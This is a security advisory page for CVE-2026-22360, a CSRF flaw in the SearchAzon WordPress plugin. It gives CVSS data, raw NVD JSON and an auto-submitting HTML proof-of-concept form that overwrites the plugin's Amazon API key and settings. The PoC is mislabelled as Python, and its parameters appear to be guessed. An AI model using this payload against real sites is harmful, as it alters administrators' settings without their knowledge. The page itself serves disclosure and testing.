Security Vulnerability Report
中文
CVE-2026-22360 CVSS 4.3 MEDIUM

CVE-2026-22360

Published: 2026-01-22 17:16:32
Last Modified: 2026-04-15 00:35:42

Description

Cross-Site Request Forgery (CSRF) vulnerability in AA-Team SearchAzon searchazon allows Cross Site Request Forgery.This issue affects SearchAzon: from n/a through <= 1.4.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

SearchAzon <= 1.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2026-22360 - SearchAzon Plugin --> <!-- This PoC demonstrates a CSRF attack targeting SearchAzon plugin settings --> <!DOCTYPE html> <html> <head> <title>SearchAzon CSRF PoC</title> </head> <body> <h1>SearchAzon Plugin CSRF Attack PoC</h1> <p>CVE-2026-22360 - Cross-Site Request Forgery in SearchAzon Plugin</p> <!-- Malicious form that auto-submits to target WordPress site --> <form id="csrfForm" action="http://target-site.com/wp-admin/admin-post.php" method="POST" style="display:none;"> <!-- Plugin-specific action parameters --> <input type="hidden" name="action" value="searchazon_save_settings"> <input type="hidden" name="searchazon_amazon_key" value="malicious_key"> <input type="hidden" name="searchazon_amazon_secret" value="malicious_secret"> <input type="hidden" name="searchazon_default_search" value="malicious_search"> <!-- Add security nonce if known or try without it --> <input type="hidden" name="_wpnonce" value=""> </form> <script> // Auto-submit form when page loads document.addEventListener('DOMContentLoaded', function() { console.log('CSRF PoC loaded - submitting form...'); document.getElementById('csrfForm').submit(); }); </script> <p>If successful, the plugin settings will be modified without the admin's knowledge.</p> <p><strong>Note:</strong> This PoC is for educational and security testing purposes only.</p> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22360", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:32.100", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in AA-Team SearchAzon searchazon allows Cross Site Request Forgery.This issue affects SearchAzon: from n/a through <= 1.4."}, {"lang": "es", "value": "Vulnerabilidad de falsificación de petición en sitios cruzados (CSRF) en AA-Team SearchAzon searchazon permite la falsificación de petición en sitios cruzados. Este problema afecta a SearchAzon: desde n/a hasta &lt;= 1.4."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/searchazon/vulnerability/wordpress-searchazon-plugin-1-4-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}